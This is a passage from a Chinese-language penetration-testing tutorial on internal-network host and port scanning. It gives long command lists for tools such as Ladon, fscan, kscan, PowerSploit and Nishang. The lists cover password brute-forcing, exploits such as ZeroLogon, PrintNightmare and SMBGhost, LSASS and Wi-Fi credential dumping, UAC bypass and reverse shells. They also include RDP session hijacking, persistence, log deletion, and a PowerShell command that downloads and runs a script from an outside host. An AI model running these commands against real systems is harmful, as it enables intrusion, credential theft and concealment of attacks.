4. 内网IP扫描技术

NetBIOS

这是一款用于扫描Windows网络上NetBIOS名字信息的程序。该程序对给出范围内的每一个地址发 送NetBIOS状态查询，并且以易读的表格列出接收到的信息，对于每个响应的主机，NBTScan列出 它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。但只能用于局域网,NBTSCAN可以取到 PC的真实IP地址和MAC地址，如果有”ARP攻击”在做怪，可以找到装有ARP攻击的PC的IP/和

MAC地址。但只能用于局域网

下载地址 http://www.unixwiz.net/tools/nbtscan.html

用法：nbtscan.exe + IP

ICMP

除了利用NetBIOS探测内网，还可以利用ICMP协议探测内网。依次对内网中的每个IP地址执行ping 命令，可以快速找出内网中所有存活酌主机。在渗透测试中中，可以使用如下命令循环探测整个C段

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL=" 

ARP

使用arp协议进行IP探测

apr -t IP 

Kscan

kscan是一款资产]测绘工具，可针对指定资产进行端口扫描以及TCP指纹识别和Banner抓取，在不 发送更多的数据包的情况下尽可能的获取端口更多信息。并能够针对扫描结果进行自动化暴力破解， 且是go平台首款开源的RDP暴力破解工具

下载地址 https://github.com/lcvvvv/kscan

用法

usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--touch,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] 
optional arguments: 
  -h , --help     show this help message and exit 
  -f , --fofa     从fofa获取检测对象，需提前配置环境变量:FOFA_EMAIL、FOFA_KEY 
  -t , --target   指定探测对象： 
                  IP地址：114.114.114.114 
                  IP地址段：114.114.114.114/24,不建议子网掩码小于12 
                  IP地址段：114.114.114.114-115.115.115.115 
                  URL地址：https://www.baidu.com 
                  文件地址：file:/tmp/target.txt 
  --spy           网段探测模式，此模式下将自动探测主机可达的内网网段可接收参数为： 
                  (空)、192、10、172、all、指定IP地址(将探测该IP地址B段存活网关) 
  --check         针对目标地址做指纹识别，仅不会进行端口探测 
  --scan          将针对--fofa、--spy提供的目标对象，进行端口扫描和指纹识别 
  --touch         获取指定端口返回包，可以使用此次参数获取返回包，完善指纹库，格式为：IP:PORT 
  -p , --port     扫描指定端口，默认会扫描TOP400，支持：80,8080,8088-8090 
  -o , --output   将扫描结果保存到文件 
  -oJ             将扫描结果使用json格式保存到文件 
  -Pn            使用此参数后，将不会进行智能存活性探测，现在默认会开启智能存活性探测，提高效率   -Cn             使用此参数后，控制台输出结果将不会带颜色 
  -Dn             使用此参数后，将关闭CDN识别功能 
  -sV             使用此参数后，将对所有端口进行全探针探测，此参数极度影响效率，慎用！ 
  --top           扫描经过筛选处理的常见端口TopX，最高支持1000个，默认为TOP400 
  --proxy         设置代理(socks5|socks4|https|http)://IP:Port 
  --threads       线程参数,默认线程100,最大值为2048 
  --path          指定请求访问的目录，只支持单个目录 
  --host          指定所有请求的头部Host值 
  --timeout       设置超时时间 
  --encoding      设置终端输出编码，可指定为：gb2312、utf-8 
  --match         对资产返回banner进行检索，存在关键字的，才会显示，否则不会显示 
  --hydra         自动化爆破支持协议：ssh,rdp,ftp,smb,mysql,mssql,oracle,postgresql,mongodb,redis,默认会开启全部 
hydra options: 
   --hydra-user   自定义hydra爆破用户名:username or user1,user2 or file:username.txt 
   --hydra-pass   自定义hydra爆破密码:password or pass1,pass2 or file:password.txt 
                  若密码中存在使用逗号的情况，则使用\,进行转义，其他符号无需转义 
   --hydra-update 自定义用户名、密码模式，若携带此参数，则为新增模式，会将用户名和密码补充在默认字典后面。否则将    --hydra-mod    指定自动化暴力破解模块:rdp or rdp,ssh,smb 
fofa options: 
   --fofa-syntax  将获取fofa搜索语法说明 
   --fofa-size    将设置fofa返回条目数，默认100条 
   --fofa-fix-keyword 修饰keyword，该参数中的{}最终会替换成-f参数的值 

fscan

一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服 务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、 web漏洞扫描、netbios探测、域控识别等功能。

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) 
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) 
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行) 
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口) 
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名密码来进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 ) 
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞) 
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块) 
fscan.exe -hf ip.txt  (以文件导入) 
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080) fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量) 

ladon

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密 码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主 机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标 网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间 件、开放服务、路由器、数据库等信息，漏洞检测包含MS17010、SMBGhost、Weblogic、 ActiveMQ、Tomcat、Struts2系列等，密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、 SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、 BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(wmiexe/psexec/atexec/sshexec /jspshell),Web指纹识别模块可识别75种（Web应用、中间件、脚本类型、页面类型）等，可高度 自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配 置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支 持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

001 自定义线程扫描

例子：扫描目标10.1.2段是否存在MS17010漏洞 单线程：Ladon 10.1.2.8/24 MS17010 t=1 80线程：Ladon noping 10.1.2.8/24 MS17010 t=80 
在高强度防护下的网络默认线程无法扫描，必须单线程

002 Socks5代理扫描

例子：扫描目标10.1.2段是否存在MS17010漏洞（必须加noping）
Ladon noping 10.1.2.8/24 MS17010 

003 网段扫描/批量扫描 CIDR

格式：不只是/24/16/8(所有) Ladon 192.168.1.8/24 扫描模块 Ladon  192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块 

字母格式：仅C段B段A段 顺序排序 Ladon 192.168.1.8/c 扫描模块 Ladon 192.168.1.8/b 扫描模块 Ladon 192.168.1.8/a 扫描模块 

004 ICMP批量扫描C段列表存活主机

Ladon ip24.txt ICMP

005 ICMP批量扫描B段列表存活主机

Ladon ip16.txt ICMP

006 ICMP批量扫描cidr列表(如某国IP段)

Ladon cidr.txt ICMP

007 ICMP批量扫描域名是否存活

Ladon domain.txt ICMP

008 ICMP批量扫描机器是否存活

Ladon host.txt ICMP

009 批量识别URL列表CMS

Ladon url.txt WhatCMS

010 批量检测DrayTek路由器版本、漏洞、弱口令

Ladon url.txt DraytekPoc

011 批量解密Base64密码

Ladon str.txt DeBase64

资产扫描、指纹识别、服务识别、存活主机、端口扫描

012 ICMP扫描存活主机(最快)

Ladon 192.168.1.8/24 ICMP

013 Ping探测存活主机(调用系统Ping命令 回显ms、ttl等信息)

Ladon 192.168.1.8/24  Ping

014 多协议探测存活主机 （IP、机器名、MAC/域名、制造商/系统版本）

Ladon 192.168.1.8/24 OnlinePC

015 多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）

Ladon 192.168.1.8/24 OsScan

016 OXID探测多网卡主机

Ladon 192.168.1.8/24 EthScan

Ladon 192.168.1.8/24 OxidScan 

017 DNS探测多网卡主机

Ladon 192.168.1.8/24 DnsScan

018 多协议扫描存活主机IP

Ladon 192.168.1.8/24 OnlineIP

019 扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 MS17010 

020 SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 SMBGhost 

021 扫描Web信息/Http服务

Ladon 192.168.1.8/24  WebScan 

022 扫描C段站点URL域名

Ladon 192.168.1.8/24 UrlScan 

023 扫描C段站点URL域名

Ladon 192.168.1.8/24 SameWeb 

024 扫描子域名、二级域名

Ladon baidu.com SubDomain 

025 域名解析IP、主机名解析IP

Ladon baidu.com DomainIP 

Ladon baidu.com HostIP 

026 DNS查询域内机器、IP (条件域内)

Ladon AdiDnsDump 192.168.1.8 (Domain IP) 

027 查询域内机器、IP (条件域内)

Ladon GetDomainIP 

028 扫描C段端口、指定端口扫描

Ladon 192.168.1.8/24 PortScan 

Ladon 192.168.1.8 PortScan 80,445,3389 

029 扫描C段WEB及识别CMS（86+Web指纹识别）

Ladon 192.168.1.8/24 WhatCMS 

030 扫描思科设备

Ladon 192.168.1.8/24 CiscoScan

Ladon http://192.168.1.8 CiscoScan 

031 枚举Mssql数据库主机 （数据库IP、机器名、SQL版本）

Ladon EnumMssql

032 枚举网络共享资源 （域、IP、主机名\共享路径）

Ladon EnumShare 

033 扫描LDAP服务器(探测域控)

Ladon 192.168.1.8/24 LdapScan 

034 扫描FTP服务器

Ladon 192.168.1.8/24 FtpScan 

暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

密码爆破详解参考SSH：http://k8gege.org/Ladon/sshscan.html

035 445端口 SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

036 135端口 Wmi密码爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

037 389端口 LDAP服务器、AD域密码爆破(Windows)

Ladon 192.168.1.8/24 LdapScan 

038 5985端口 Winrm密码爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan.ini 

039 445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan 

040 135端口 Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan 

041 22端口 SSH密码爆破(Linux)

Ladon 192.168.1.8/24 SshScan

Ladon 192.168.1.8:22 SshScan 

042 1433端口 Mssql数据库密码爆破

Ladon 192.168.1.8/24 MssqlScan 

043 1521端口 Oracle数据库密码爆破

Ladon  192.168.1.8/24 OracleScan 

044 3306端口 Mysql数据库密码爆破

Ladon 192.168.1.8/24  MysqlScan 

045 7001端口 Weblogic后台密码爆破

Ladon http://192.168.1.8:7001/console WeblogicScan

 Ladon 192.168.1.8/24 WeblogicScan 

046 5900端口 VNC远程桌面密码爆破

Ladon 192.168.1.8/24 VncScan 

047 21端口 Ftp服务器密码爆破

Ladon  192.168.1.8/24  FtpScan 

048 8080端口 Tomcat后台登陆密码爆破

Ladon 192.168.1.8/24 TomcatScan 

Ladon http://192.168.1.8:8080/manage TomcatScan 

049 Web端口 401基础认证密码爆破

Ladon http://192.168.1.8/login HttpBasicScan 

050 445端口 Impacket SMB密码爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini 

051 445端口 IPC密码爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini 

052 139端口Netbios协议Windows密码爆破

Ladon 192.168.1.8/24 NbtScan 

053 5985端口Winrm协议Windows密码爆破

Ladon 192.168.1.8/24 WinrmScan 

054 网络摄像头密码爆破(内置默认密码)

Ladon 192.168.1.8/24 DvrScan 

漏洞检测/Poc

055 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

Ladon 192.168.1.8/24 MS17010 

056 SMBGhost漏洞检测 CVE-2020-0796

Ladon 192.168.1.8/24 SMBGhost 

057 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc 

058 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)

Ladon 192.168.1.8/24 PhpStudyPoc 

059 ActiveMQ漏洞检测(CVE-2016-3088)

Ladon 192.168.1.8/24  ActivemqPoc 

060 Tomcat漏洞检测(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatPoc 

061 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

Ladon 192.168.1.8/24 Struts2Poc 

062 DraytekPoc CVE-2020-8515漏洞检测、Draytek版本探测、弱口令检测

Ladon 192.168.1.8 DraytekPoc 

Ladon  192.168.1.8/24 DraytekPoc 

漏洞利用/Exploit

063 Weblogic漏洞利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp 

064 Tomcat漏洞利用(CVE-2017-12615)

Ladon 192.168.1.8/24  TomcatExp 

065 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)

 Ladon CmdDll x86 calc 

Ladon CmdDll x64 calc 

Ladon CmdDll b64x86 YwBhAGwAYwA= 

Ladon CmdDll b64x64 YwBhAGwAYwA= 

066 CVE-2021-40444 微软IE/Office 0day漏洞

 Ladon CVE-2021-40444 MakeCab poc.dll 

Ladon CVE-2021-40444 MakeHtml http://192.168.1.8 

067 DraytekExp CVE-2020-8515远程执行命令EXP

Ladon DraytekExp http://192.168.1.8 whoami 

068 ZeroLogon CVE-2020-1472域控提权(密码置空)

Ladon ZeroLogon dc.k8gege.org 

069 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)

Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520 

070 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished" 

文件下载、文件传输

071 HTTP下载

Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar 

072 Ftp下载

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe 

加密解密(HEX/Base64)

073 Hex加密解密

Ladon 123456 EnHex 

Ladon 313233343536 DeHex 

074 Base64加密解密

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 

网络嗅探

075 Ftp密码嗅探

Ladon FtpSniffer 192.168.1.5 

076 HTTP密码嗅探

Ladon HTTPSniffer 192.168.1.5 

077 网络嗅探

Ladon Sniffer 

密码读取

078 读取IIS站点密码、网站路径

Ladon IISpwd

079 读取连接过的WIFI密码

Ladon WifiPwd

080 读取FileZilla FTP密码

Ladon FileZillaPwd 

081 读取系统Hash、VPN密码、DPAPI-Key

Ladon CVE-2021-36934 

082 DumpLsass内存密码(mimikatz明文) 限9.1.1版本之前

Ladon DumpLsass 

信息收集

083 获取本机内网IP与外网IP

Ladon GetIP 

084 获取PCname GUID CPUID DiskID Mac地址

Ladon GetID 

085 查看用户最近访问文件

Ladon Recent 

086 USB使用记录查看(USB名称、USB标记、路径信息)

Ladon UsbLog 

087 检测后门(注册表启动项、DLL劫持)

 Ladon CheckDoor 

Ladon AutoRun 

088 进程详细信息(程序路径、位数、启动参数、用户)

 Ladon EnumProcess 

Ladon Tasklist 

089 获取命令行参数

Ladon cmdline 

Ladon cmdline cmd.exe 

090 获取渗透基础信息

 Ladon GetInfo 

Ladon GetInfo2 

091 .NET & PowerShell版本

Ladon NetVer 

Ladon PSver 

Ladon NetVersion 

Ladon PSversion 

092 运行时版本&编译环境

Ladon Ver 

Ladon Version 

093 运行时版本&编译环境&安装软件列表

Ladon AllVer 

Ladon AllVersion 

094 查看IE代理信息

Ladon QueryProxy 

095 列目录

Ladon DirList         默认列全盘 

Ladon DirList c:\  指定盘符或目录 

096 QueryAdmin查看管理员用户

Ladon QueryAdmin  

097 查看本机命名管道

Ladon GetPipe 

098 RdpLog查看3389连接记录

Ladon RdpLog 

远程执行(psexec/wmiexec/atexec/sshexec/smbexec)

099 445端口 加密PSEXEC远程执行命令（交互式）

net user \\192.168.1.8 k8gege520 /user:k8gege Ladon psexec [192.168.1.8](http://192.168.1.8) 

psexec> whoami 

nt authority\system 

100 135端口 WmiExec远程执行命令 （非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami  (8.2前用法) 

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami  (8.2后用法) 

Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p  (8.2后用法) 

101 445端口 AtExec远程执行命令（非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami 

102 22端口 SshExec远程执行命令（非交互式）

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami

 Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami 

103 JspShell远程执行命令（非交互式）

Usage：Ladon JspShell type url pwd cmd 

Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami 

104 WebShell远程执行命令（非交互式）

Usage：Ladon WebShell ScriptType ShellType url pwd cmd 
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami 

105 135端口 WmiExec2远程执行命令 （非交互式）支持文件上传

Usage: 

Ladon WmiExec2 host user pass cmd whoami 

Ladon WmiExec2 pth host cmd whoami 

Base64Cmd for Cobalt Strike 

Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA 

Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA Upload: 

Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe Ladon WmiExec2 pth host upload beacon.exe ceacon.exe 

106 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami 

Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p 

107 WinrmExec远程执行命令无回显（支持System权限）

Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe 

提权降权

108 whoami查看当前用户权限以及特权

Ladon whoami 

109 6种白名单BypassUAC(8.0后)Win7-Win10

用法: Ladon BypassUAC Method Base64Cmd 

Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl 

Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl 

Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl 

Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl 

Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl 

Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ== 

110 BypassUac2 绕过UAC执行,支持Win7-Win10

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat 

111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP

Ladon PrintNightmare c:\evil.dll Ladon CVE-2021-1675 c:\evil.dll 

112 CVE-2022-21999 SpoolFool打印机漏洞提权EXP

Ladon SpoolFool poc.dll 

Ladon CVE-2022-21999 poc.dll 

113 GetSystem 提权System权限执行CMD

Ladon GetSystem cmd.exe  

114 复制令牌执行CMD(如system权限降权exploer当前用户)

Ladon GetSystem cmd.exe explorer 

115 Runas 模拟用户执行命令

Ladon Runas user pass cmd 

116 MS16135提权至SYSTEM

Ladon ms16135 whoami 

117 BadPotato服务用户提权至SYSTEM

Ladon BadPotato cmdline 

118 SweetPotato服务用户提权至SYSTEM

Ladon SweetPotato cmdline 

119 EfsPotato Win7-2019提权(服务用户权限提到system)

Ladon EfsPotato whoami 

120 Open3389一键开启3389

Ladon Open3389 

121 激活内置管理员Administrator

Lado ActiveAdmin 

122 激活内置用户Guest

Ladon ActiveGuest 

反弹Shell

123 反弹TCP NC Shell

Ladon ReverseTcp 192.168.1.8 4444 nc 

124 反弹TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444 shell 

125 反弹TCP MSF MET Shell

Ladon ReverseTcp 192.168.1.8 4444 meter 

126 反弹HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444 

127 反弹HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444 

128 反弹TCP CMD & PowerShell Shell

Ladon PowerCat 192.168.1.8 4444 cmd

 Ladon PowerCat 192.168.1.8 4444 psh 

129 反弹UDP Cmd & PowerShell Shell

Ladon PowerCat 192.168.1.8 4444 cmd udp 

Ladon PowerCat 192.168.1.8 4444 psh udp 

130 netsh本机888端口转发至112的22端口

Ladon netsh add 888 192.168.1.112 22 

131 PortTran端口转发(3389例子)

 VPS监听: Ladon PortTran 8000 338 

目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000 本机连接: mstsc VPS_IP:338 

本机执行

132 RDP桌面会话劫持（无需密码）

Ladon RdpHijack 3 

Ladon RdpHijack 3 console 

133 添加注册表Run启动项

Ladon RegAuto Test c:\123.exe 

134 AT计划执行程序(无需时间)(system权限)

Ladon at c:\123.exe Ladon at c:\123.exe gui  

135 SC服务加启动项&执行程序(system权限）

Ladon sc c:\123.exe 

Ladon sc c:\123.exe gui 

Ladon sc c:\123.exe auto ServerName 

系统信息探测

136 Snmp协议探测操作系统、设备等信息

Ladon 192.168.1.8/24 SnmpScan 

137 Nbt协议探测Windows主机名、域、用户

Ladon 192.168.1.8/24 NbtInfo 

138 Smb协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 SmbInfo 

139 Wmi协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 WmiInfo 

140 Mssql协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 MssqlInfo 

141 Winrm协议探测Windows版本、主机名、域

Ladon 192.168.1.8/24 WinrmInfo 

142 Exchange探测Windows版本、主机名、域

Ladon 192.168.1.8/24 ExchangeInfo 

143 Rdp协议探测Windows版本、主机名、域

For单线程: Ladon 192.168.1.8/24 RdpInfo f=1 

其它功能

144 Win2008一键启用.net 3.5

Ladon EnableDotNet 

145 获取内网站点HTML源码

Ladon gethtml http://192.168.1.1 

146 一键迷你WEB服务器

Ladon web 80 Ladon web 80 dir 

获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg) http://192.168.1.8/ip.txt 

147 getstr/getb64/debase64(无回显漏洞回显结果)

监听 Ladon web 800 

提交 返回明文 

certutil.exe -urlcache -split -f [http://192.168.1.8:800/getstr/test123456](http://192.168.1.8:800/getstr/test123456Base64加密结果certutil.exe) [Base64加密结果](http://192.168.1.8:800/getstr/test123456Base64加密结果certutil.exe) 

[certutil.exe](http://192.168.1.8:800/getstr/test123456Base64加密结果certutil.exe) -urlcache -split -f [http://192.168.1.110:800/getbase64/k8gege520](http://192.168.1.110:800/getbase64/k8gege520Base64结果解密certutil.exe) [Base64结果解密](http://192.168.1.110:800/getbase64/k8gege520Base64结果解密certutil.exe) 

[certutil.exe](http://192.168.1.110:800/getbase64/k8gege520Base64结果解密certutil.exe) -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw 

148 Shiro插件探测

Ladon 192.168.1.8/24 IsShiro 

149 LogDelTomcat 删除Tomcat指定IP日志

Ladon LogDelTomcat access.log 192.168.1.8 

150 C#自定义程序集插件扫描

Ladon 192.168.1.8/24 Poc.exe Ladon 192.168.1.8/24 *.dll(c#) 

5. 内网端口扫描技术

通过查询目标主机的端口开放信息，不仅可以了解目标主机所开放的服务，还可以找出其开放服务的涌洞、分析目 标网络的拓扑结构等， 在进行内网渗测试时，通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具，使用工具进行扫描。还可以根据服务器的环境，使用自定义的端口扫描脚本进行扫描。在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。

ScanLine

ScanLine是一款windows下的端口扫描的命令行程序。它可以完成PING扫描、TCP端口扫描、UDP端口扫描等功 能。运行速度很快，不需要winPcap库支持，应用场合受限较少。

‐？	‐ 显示此帮助文本
‐b	‐ 获取端口横幅
‐c	‐ TCP 和 UDP 尝试超时（毫秒）。 默认值为 4000
‐d	‐ 扫描之间的延迟（毫秒）。 默认为 0
‐f	‐ 从文件中读取 IP。 使用“stdin”作为标准输入
‐g	‐ 绑定到给定的本地端口
‐h	‐ 隐藏没有开放端口的系统的结果
‐i	‐ 除了 Echo 请求之外，用于 ping 使用 ICMP 时间戳请求
‐j	‐ 不要在 IP 之间输出“‐‐‐‐‐...”分隔符
‐l	‐ 从文件中读取 TCP 端口
‐L	‐ 从文件中读取 UDP 端口
‐m	‐ 绑定到给定的本地接口 IP
‐n	‐ 不扫描端口 ‐ 仅 ping（除非您使用 ‐p）
‐o	‐ 输出文件（覆盖）
‐O	‐ 输出文件（追加）
‐p	‐ 扫描前不要 ping 主机
‐q	‐ ping 超时（毫秒）。 默认值为 2000
‐r	‐ 将 IP 地址解析为主机名
‐s	‐ 以逗号分隔格式输出 (csv)
‐t	‐ 要扫描的 TCP 端口（以逗号分隔的端口/范围列表）
‐T	‐ 使用 TCP 端口的内部列表
‐u	‐ 要扫描的 UDP 端口（以逗号分隔的端口/范围列表）
‐U	‐ 使用 UDP 端口的内部列表
‐v	‐ 详细模式
‐z	‐ 随机化 IP 和端口扫描顺序

scanline.exe ‐bhpt 21‐23,25,80,110,135‐139,143,443,445,1433,1521,3306,3389,5556,5631,5900,8080 100.100.0.39
scanline.exe ‐bhpt 80,443 100.100.0.1‐254(IP) scanline.exe ‐bhpt 139,445	IP

Telnet

Telnet协议是TCP/IP协议族的一员，是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算 机上完成远程主机工作的能力。在目标计算机上使用Telnet协议，可以与目标服务器建立连接。如果只是想快速探测某台主机的某个常规高危端口是否开放，使用telnet命令是最方便的

telnet + IP+端口

RedTeamTool

RedTeamTool中有一个本地端口扫面的工具

portscan 10000

PowerSpioit

PowerSploit是一款基于PowerShell的后渗透框架软件，包含了很多PowerShell的攻击脚本，它们主要用于渗透中 的信息侦测，权限提升、权限维持等

下载地址： https://github.com/PowerShellMafia/PowerSploit

ActivirusBypass：发现杀毒软件的查杀特征CodeExecution：在目标主机上执行代码Exfiltration：目标主机上的信息搜集工具Mayhem：蓝屏等破坏性的脚本Persistence：后门脚本
Privsec：提权等脚本
Recon：以目标主机为跳板进行内网信息侦查
ScriptModification：在目标主机上创建或修改脚本

本地执行

powershell ‐exec bypass Import‐Module .\Invoke-Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

远程执行

python -m http.server 80 开启http服务

powershell ‐exec bypass ‐c IEX (New‐Object System.Net.Webclient).DownloadString('http://118.178.134.226:8080/Invoke‐Portscan.ps1');import‐ module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

Nishang

Nishang是一款针对PowerShell的渗透工具,非常的好用。

使用方式

Set‐ExecutionPolicy remotesigned 允许导入
Import‐Module .\nishang.psm1	导入模块
Invoke‐PortScan ‐StartAddress 192.168.41.1 ‐EndAddress 192.168.41.21 ‐ResolveHost 扫 描
powershell ‐command "& { import‐module .\nishang\nishang.psm1; Invoke‐PortScan ‐StartAddress 192.168.41.1 ‐EndAddress 192.168.41.255 ‐ResolveHost }"

powershell‐import	//导入各种powershell脚本，这里可以导入nishang模块beacon>powershell posershell脚本名
或者
powershell Check‐VM

Kscan

fscan

常见端口服务

文件共享服务端口

端 口 号	端口说明	使用说明
21、22、69	FTP/ FTP 文件传输协议	允许匿名的上传、下载、爆破和嗅探操作
2049	NFS 服务	配置不当
139	SAMBA 服务	爆破、未授权访问、远程代码执行
389	LDAP 目录访问协议	注入、允许匿名访问、弱口令

远程连接服务端口

端 口 号	端口说明	使用说明
22	SSH远程连接	爆破、SSH隧道及内网代理转发、文件传输
23	Telnet 远程连接	爆破、嗅探、弱口令
3389	RDP 远程桌面连接	Shift 后门 (2003 以下版本） 爆破
5900	VNC	弱口令爆破
5632	PcAnywhere 服务	抓取密码、代码执行

Web 应用服务端口

端口号	端口说明	使用说明
80、443、8080	常见的Web 服务端口	Web 攻击、爆破、对应服务器版本漏洞
7001 、7002	WebLogic 控制台	Java 反序列化、弱口令
8080 、8089	JBoss/Resin/Jetty/Jenkins	反序列化、控制台弱口令
9090	WebSphere 控制台	Java 反序列化、弱口令
4848	GlassFish 控制台	弱口令
1352	Lotus Domino 邮件服务	弱口令、信息泄露、爆破
10000	webmin 控制面板	弱口令

数据库服务端口

端口号	端口说明	使用说明
3306	MySQL 数据库	注入、提权、爆破
1433	MSSQL 数据库	注入、提权、SA 弱口令、爆破
1521	Ora cle 数据库	1N S 爆破、注入、反弹She ll
5432	Post greSQL数据库	爆破、注入、弱口令
27017 、27018	MongoDB 数据库	爆破、未授权访问
6379	Redis 数据库	可尝试未授权访问、弱口令爆破
5000	Sysbase/DB2 数据库	爆破、注入

邮件服务端口

端口号	端口说明	使用说明
25	SMTP邮件服务	邮件伪造
110	POP3协议	爆破,嗅探
143	IMAP协议	爆破

网络常见协议端口

端口号	端口说明	使用说明
53	DNS域名系统	允许区域传送,DNS劫持,缓存投毒,欺骗
67,68	DHCP服务	劫持,欺骗
161	SNMP协议	爆破,搜集目标内网信息

特殊服务端口

端口号	端口说明	使用说明
2181	ZooKeeper	未授权访问
8069	Zabbix服务	远程执行,SQL注入
